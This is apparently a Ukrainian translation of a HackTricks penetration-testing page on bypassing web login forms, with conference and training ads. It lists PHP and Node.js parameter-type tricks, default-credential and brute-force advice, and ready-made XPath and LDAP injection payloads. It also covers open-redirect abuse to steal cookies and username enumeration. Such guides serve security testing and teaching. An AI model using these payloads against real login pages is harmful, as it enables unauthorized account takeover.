Login Bypass

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

RootedCON - найбільш важлива подія з кібербезпеки в Іспанії та одна з найважливіших в Європі. З місією просування технічних знань, цей конгрес є важливою точкою зустрічі для професіоналів технологій та кібербезпеки у будь-якій дисципліні.

Пропуск звичайного логіну

Якщо ви знаходите сторінку входу, тут ви можете знайти деякі техніки для спроби пропуску:

  • Перевірте наявність коментарів на сторінці (прокрутіть вниз і праворуч?)

  • Перевірте, чи можете ви прямо отримати доступ до обмежених сторінок

  • Перевірте, щоб не відправляти параметри (не відправляйте жоден або лише 1)

  • Перевірте помилку порівнянь PHP: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b

  • Змініть тип вмісту на json та надішліть значення json (включено bool true)

  • Якщо ви отримуєте відповідь, що POST не підтримується, ви можете спробувати надіслати JSON в тілі, але з запитом GET з Content-Type: application/json

  • Перевірте можливу помилку розбору nodejs (читайте це): password[password]=1

  • Nodejs перетворить цей навантаження на запит, схожий на наступний: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; що робить біт пароля завжди істинним.

  • Якщо ви можете надіслати об'єкт JSON, ви можете надіслати "password":{"password": 1} для пропуску логіну.

  • Пам'ятайте, що для пропуску цього логіну вам все ще потрібно знати та надіслати дійсне ім'я користувача.

  • Додавання опції "stringifyObjects":true при виклику mysql.createConnection в кінцевому підсумку заблокує всі непередбачувані поведінки при передачі Object в параметрі.

  • Перевірте облікові дані:

  • Стандартні облікові дані використовуваної технології/платформи

  • Загальні комбінації (root, admin, password, назва технології, типовий користувач з одним з цих паролів).

  • Створіть словник, використовуючи Cewl, додайте типове ім'я користувача та пароль (якщо є) та спробуйте виконати перебір за допомогою всіх слів як імен користувачів та паролів

  • Перебір за допомогою більшого словника (Перебір)

Пропуск аутентифікації SQL Injection

Тут ви можете знайти кілька трюків для пропуску логіну через SQL ін'єкції.

На наступній сторінці ви знайдете власний список для спроби пропуску логіну через SQL Injections:

pageLogin bypass List

Пропуск аутентифікації No SQL Injection

Тут ви можете знайти кілька трюків для пропуску логіну через No SQL Injections.

Оскільки для NoSQL Injections потрібно змінити значення параметрів, вам доведеться тестувати їх вручну.

Пропуск аутентифікації XPath Injection

Тут ви можете знайти кілька трюків для пропуску логіну через XPath Injection.

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

Пропуск аутентифікації LDAP Injection

Тут ви можете знайти кілька хитрощів для обходу входу через LDAP Injection.

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Запам'ятай мене

Якщо на сторінці є функціонал "Запам'ятати мене", перевірте, як він реалізований, і подивіться, чи можете ви його зловживати для захоплення інших облікових записів.

Перенаправлення

Зазвичай сторінки перенаправляють користувачів після входу, перевірте, чи можете ви змінити це перенаправлення, щоб викликати Відкрите перенаправлення. Можливо, ви зможете вкрасти деяку інформацію (коди, файли cookie...), якщо перенаправите користувача на свій веб-сайт.

Інші перевірки

  • Перевірте, чи можете ви перелічити імена користувачів, зловживаючи функціоналом входу.

  • Перевірте, чи активовано автозаповнення в паролі/чутливій інформації формах вводу: <input autocomplete="false"

​​RootedCON - найбільш важлива подія з кібербезпеки в Іспанії та одна з найважливіших в Європі. З місією просування технічних знань, цей конгрес є кипучою точкою зустрічі для професіоналів технологій та кібербезпеки у будь-якій галузі.

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Last updated